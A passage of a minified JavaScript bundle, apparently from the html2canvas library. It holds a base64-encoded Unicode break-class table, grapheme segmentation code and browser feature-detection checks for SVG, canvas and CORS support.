cABwAFAAAAAAAAAAAAAAAAAAAABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAcABwAAAAAAAAAHAAcABwAAAAcABwAHAAUAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAABQAHAAcABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABwAHAAcABwAAAAUABQAFAAAABQAFAAUABQAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAcABQAHAAcABQAHAAcAAAAFAAcABwAAAAcABwAFAAUAAAAAAAAAAAAAAAAAAAAFAAUAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAUABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAFAAcABwAFAAUABQAAAAUAAAAHAAcABwAHAAcABwAHAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAHAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABwAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAUAAAAFAAAAAAAAAAAABwAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABwAFAAUABQAFAAUAAAAFAAUAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABwAFAAUABQAFAAUABQAAAAUABQAHAAcABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABQAFAAAAAAAAAAAABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAcABQAFAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAHAAUABQAFAAUABQAFAAUABwAHAAcABwAHAAcABwAHAAUABwAHAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABwAHAAcABwAFAAUABwAHAAcAAAAAAAAAAAAHAAcABQAHAAcABwAHAAcABwAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAcABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABQAHAAUABQAFAAUABQAFAAUAAAAFAAAABQAAAAAABQAFAAUABQAFAAUABQAFAAcABwAHAAcABwAHAAUABQAFAAUABQAFAAUABQAFAAUAAAAAAAUABQAFAAUABQAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABwAFAAcABwAHAAcABwAFAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAUABQAFAAUABwAHAAUABQAHAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAcABQAFAAcABwAHAAUABwAFAAUABQAHAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAcABwAHAAcABwAHAAUABQAFAAUABQAFAAUABQAHAAcABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUAAAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAcABQAFAAUABQAFAAUABQAAAAAAAAAAAAUAAAAAAAAAAAAAAAAABQAAAAAABwAFAAUAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAAABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUAAAAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAABQAAAAAAAAAFAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAUABQAHAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABwAHAAcABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAFAAUABQAHAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAcABwAFAAUABQAFAAcABwAFAAUABwAHAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAcABwAFAAUABwAHAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAFAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAFAAUABQAAAAAABQAFAAAAAAAAAAAAAAAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABQAFAAcABwAAAAAAAAAAAAAABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABwAFAAcABwAFAAcABwAAAAcABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAAAAAAAAAAAAAAAAAFAAUABQAAAAUABQAAAAAAAAAAAAAABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABQAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABwAFAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAcABQAFAAUABQAFAAUABQAFAAUABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAFAAUABQAHAAcABQAHAAUABQAAAAAAAAAAAAAAAAAFAAAABwAHAAcABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABwAHAAcABwAAAAAABwAHAAAAAAAHAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAAAAAAFAAUABQAFAAUABQAFAAAAAAAAAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAFAAUABQAFAAUABQAFAAUABwAHAAUABQAFAAcABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAHAAcABQAFAAUABQAFAAUABwAFAAcABwAFAAcABQAFAAcABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAHAAcABQAFAAUABQAAAAAABwAHAAcABwAFAAUABwAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABwAHAAUABQAFAAUABQAFAAUABQAHAAcABQAHAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABwAFAAcABwAFAAUABQAFAAUABQAHAAUAAAAAAAAAAAAAAAAAAAAAAAcABwAFAAUABQAFAAcABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAFAAUABQAFAAUABQAFAAUABQAHAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAFAAUABQAFAAAAAAAFAAUABwAHAAcABwAFAAAAAAAAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABwAHAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABQAFAAUABQAFAAUABQAAAAUABQAFAAUABQAFAAcABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAAAHAAUABQAFAAUABQAFAAUABwAFAAUABwAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUAAAAAAAAABQAAAAUABQAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAHAAcAAAAFAAUAAAAHAAcABQAHAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABwAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAAAAAAAAAAAAAAAAAAABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAUABQAFAAAAAAAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAAAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAAAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAAABQAFAAUABQAFAAUABQAAAAUABQAAAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAFAAUABQAFAAUADgAOAA4ADgAOAA4ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAAAAAAAAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAMAAwADAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAAAAAAAAAAAAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAKAAoACgAAAAAAAAAAAAsADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwACwAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAOAAAAAAAAAAAADgAOAA4AAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAAAA4ADgAOAA4ADgAOAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4AAAAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4AAAAAAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAAAA4AAAAOAAAAAAAAAAAAAAAAAA4AAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAADgAAAAAAAAAAAA4AAAAOAAAAAAAAAAAADgAOAA4AAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAAAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAAAA4ADgAOAA4ADgAOAA4ADgAOAAAADgAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4AAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4ADgAOAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAOAA4ADgAOAA4AAAAAAAAAAAAAAAAAAAAAAA4ADgAOAA4ADgAOAA4ADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4AAAAOAA4ADgAOAA4ADgAAAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4ADgAOAA4AAAAAAAAAAAA="),P0=function(fe){return ba.get(fe)},Vr=function(fe,ce,ge){var _e=ge-2,je=ce[_e],tt=ce[ge-1],dt=ce[ge];if(2===tt&&3===dt)return"\xd7";if(2===tt||3===tt||4===tt||2===dt||3===dt||4===dt)return"\xf7";if(tt===Zd&&-1!==[Zd,ud,nh,Xm].indexOf(dt)||(tt===nh||tt===ud)&&(dt===ud||10===dt)||(tt===Xm||10===tt)&&10===dt||13===dt||5===dt||7===dt||1===tt)return"\xd7";if(13===tt&&14===dt){for(;5===je;)je=ce[--_e];if(14===je)return"\xd7"}if(15===tt&&15===dt){for(var _t=0;15===je;)_t++,je=ce[--_e];if(_t%2==0)return"\xd7"}return"\xf7"},Jm=function(fe){var ce=function(fe){for(var ce=[],ge=0,_e=fe.length;ge<_e;){var je=fe.charCodeAt(ge++);if(je>=55296&&je<=56319&&ge<_e){var tt=fe.charCodeAt(ge++);56320==(64512&tt)?ce.push(((1023&je)<<10)+(1023&tt)+65536):(ce.push(je),ge--)}else ce.push(je)}return ce}(fe),ge=ce.length,_e=0,je=0,tt=ce.map(P0);return{next:function(){if(_e>=ge)return{done:!0,value:null};for(var dt="\xd7";_e<ge&&"\xd7"===(dt=Vr(0,tt,++_e)););if("\xd7"!==dt||_e===ge){var _t=fC.apply(null,ce.slice(je,_e));return je=_e,{value:_t,done:!1}}return{done:!0,value:null}}}},S_=function(fe){return 0===fe[0]&&255===fe[1]&&0===fe[2]&&255===fe[3]},O0=function(fe,ce,ge,_e,je){var tt="http://www.w3.org/2000/svg",dt=document.createElementNS(tt,"svg"),_t=document.createElementNS(tt,"foreignObject");return dt.setAttributeNS(null,"width",fe.toString()),dt.setAttributeNS(null,"height",ce.toString()),_t.setAttributeNS(null,"width","100%"),_t.setAttributeNS(null,"height","100%"),_t.setAttributeNS(null,"x",ge.toString()),_t.setAttributeNS(null,"y",_e.toString()),_t.setAttributeNS(null,"externalResourcesRequired","true"),dt.appendChild(_t),_t.appendChild(je),dt},_C=function(fe){return new Promise(function(ce,ge){var _e=new Image;_e.onload=function(){return ce(_e)},_e.onerror=ge,_e.src="data:image/svg+xml;charset=utf-8,"+encodeURIComponent((new XMLSerializer).serializeToString(fe))})},ps={get SUPPORT_RANGE_BOUNDS(){var fe=function(fe){if(fe.createRange){var ge=fe.createRange();if(ge.getBoundingClientRect){var _e=fe.createElement("boundtest");_e.style.height="123px",_e.style.display="block",fe.body.appendChild(_e),ge.selectNode(_e);var je=ge.getBoundingClientRect(),tt=Math.round(je.height);if(fe.body.removeChild(_e),123===tt)return!0}}return!1}(document);return Object.defineProperty(ps,"SUPPORT_RANGE_BOUNDS",{value:fe}),fe},get SUPPORT_WORD_BREAKING(){var fe=ps.SUPPORT_RANGE_BOUNDS&&function(fe){var ce=fe.createElement("boundtest");ce.style.width="50px",ce.style.display="block",ce.style.fontSize="12px",ce.style.letterSpacing="0px",ce.style.wordSpacing="0px",fe.body.appendChild(ce);var ge=fe.createRange();ce.innerHTML="function"==typeof"".repeat?"&#128104;".repeat(10):"";var _e=ce.firstChild,je=E(_e.data).map(function(gt){return g(gt)}),tt=0,dt={},_t=je.every(function(gt,kt){ge.setStart(_e,tt),ge.setEnd(_e,tt+gt.length);var Lt=ge.getBoundingClientRect();tt+=gt.length;var Ht=Lt.x>dt.x||Lt.y>dt.y;return dt=Lt,0===kt||Ht});return fe.body.removeChild(ce),_t}(document);return Object.defineProperty(ps,"SUPPORT_WORD_BREAKING",{value:fe}),fe},get SUPPORT_SVG_DRAWING(){var fe=function(fe){var ce=new Image,ge=fe.createElement("canvas"),_e=ge.getContext("2d");if(!_e)return!1;ce.src="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'></svg>";try{_e.drawImage(ce,0,0),ge.toDataURL()}catch(je){return!1}return!0}(document);return Object.defineProperty(ps,"SUPPORT_SVG_DRAWING",{value:fe}),fe},get SUPPORT_FOREIGNOBJECT_DRAWING(){var fe="function"==typeof Array.from&&"function"==typeof window.fetch?function(fe){var ce=fe.createElement("canvas"),ge=100;ce.width=ge,ce.height=ge;var _e=ce.getContext("2d");if(!_e)return Promise.reject(!1);_e.fillStyle="rgb(0, 255, 0)",_e.fillRect(0,0,ge,ge);var je=new Image,tt=ce.toDataURL();je.src=tt;var dt=O0(ge,ge,0,0,je);return _e.fillStyle="red",_e.fillRect(0,0,ge,ge),_C(dt).then(function(_t){_e.drawImage(_t,0,0);var gt=_e.getImageData(0,0,ge,ge).data;_e.fillStyle="red",_e.fillRect(0,0,ge,ge);var kt=fe.createElement("div");return kt.style.backgroundImage="url("+tt+")",kt.style.height="100px",S_(gt)?_C(O0(ge,ge,0,0,kt)):Promise.reject(!1)}).then(function(_t){return _e.drawImage(_t,0,0),S_(_e.getImageData(0,0,ge,ge).data)}).catch(function(){return!1})}(document):Promise.resolve(!1);return Object.defineProperty(ps,"SUPPORT_FOREIGNOBJECT_DRAWING",{value:fe}),fe},get SUPPORT_CORS_IMAGES(){var fe=void 0!==(new Image).crossOrigin;return Object.defineProperty(ps,"SUPPORT_CORS_IMAGES",{value:fe}),fe},get SUPPORT_RESPONSE_TYPE(){var fe="string"==typeof(new XMLHttpRequest).responseType;return Object.defineProperty(ps,"SUPPORT_RESPONSE_TYPE",{value:fe}),fe},get SUPPORT_CORS_XHR(){var fe="withCredentials"in new XMLHttpRequest;return Object.defineProperty(ps,"SUPPORT_CORS_XHR",{value:fe}),fe},get SUPPORT_NATIVE_TEXT_SEGMENTATION(){var fe=!("undefined"==typeof Intl||!Intl.Segmenter);return Object.defineProperty(ps,"SUPPORT_NATIVE_TEXT_SEGMENTATION",{value:fe}),fe}},Ff=function fe(ce,ge){this.text=ce,this.bounds=ge},FM=function(fe,ce){var ge=ce.ownerDocument;if(ge){var _e=ge.createElement("html2canvaswrapper");_e.appendChild(ce.cloneNode(!0));var je=ce.parentNode;if(je){je.replaceChild(_e,ce);var tt=Q(fe,_e);return _e.firstChild&&je.replaceChild(_e.firstChild,_e),tt}}return I.EMPTY},gC=function(fe,ce,ge){var _e=fe.ownerDocument;if(!_e)throw new Error("Node has no owner document");var je=_e.createRange();return je.setStart(fe,ce),je.setEnd(fe,ce+ge),je},im=function(fe){if(ps.SUPPORT_NATIVE_TEXT_SEGMENTATION){var ce=new Intl.Segmenter(void 